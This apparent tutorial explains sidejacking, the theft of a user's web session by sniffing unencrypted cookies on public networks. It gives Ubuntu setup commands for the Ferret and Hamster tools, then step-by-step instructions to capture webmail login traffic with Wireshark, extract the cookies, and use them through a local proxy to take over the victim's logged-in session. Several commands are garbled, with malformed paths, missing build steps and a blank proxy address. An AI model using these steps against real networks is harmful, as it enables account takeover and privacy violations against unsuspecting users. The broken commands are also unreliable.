Sidejacking is the process of stealing someone's access to a
website, typically done on wireless public networks. To perform sidejacking attack, the application that victim is using must be in http traffic. In order to sidejack
access to a website, the bad actor uses a packet sniffer to obtain an
unencrypted cookie that will grant access to a specific application. This will
allow attacker to impersonate the user
as the session cookie is already providing access to the web application's
1) Installing Ferret and Hamster in Ubuntu linux
sudo su
apt-get install libpcap-dev
create a folder with name sidejack in root directory
mkdir sidejack
cd sidejack
mv hamster hamster2
cd hamster2/build/gcc4
cd /sidejack /ferret/build/gcc4
cd /sidejack
mkdir hamster
cp /sidejack /ferret/bin/ferret /sidejack /hamster
cp /sidejack /hamster2/bin/favicon.ico /sidejack /hamster
cp /sidejack /hamster2/bin/hamster /sidejack /hamster
cp /sidejack /hamster2/bin/hamster.css /sidejack /hamster
cp /pentest/hamster2/bin/hamster.js /sidejack /hamster
2) Capture login credentials packets of any web login(gmail,
hotmail etc) through wireshark(run wireshark in promiscuous mode) and save the file as test.pcap under directory /sidejack
3) cd /sidejack /hamster2/bin/
4) ./ferret -r test.pcap (Reads the mail id and necessary
login credentials)
5) ./hamster (Starts hamster proxy server on
6) Configure your browser with proxy server as and
port as 1234
7) Type http://hamster in your browser.
8) Click on your IP at the bottom of the page that contains
email id or any login name with which you logged into previous page while
capturing packet earlier.
9) At the right pane, you can see several cookies, click one
of them to receive the logged in session of your earlier page. Now your session
is hijacked and you can change anything inside the session.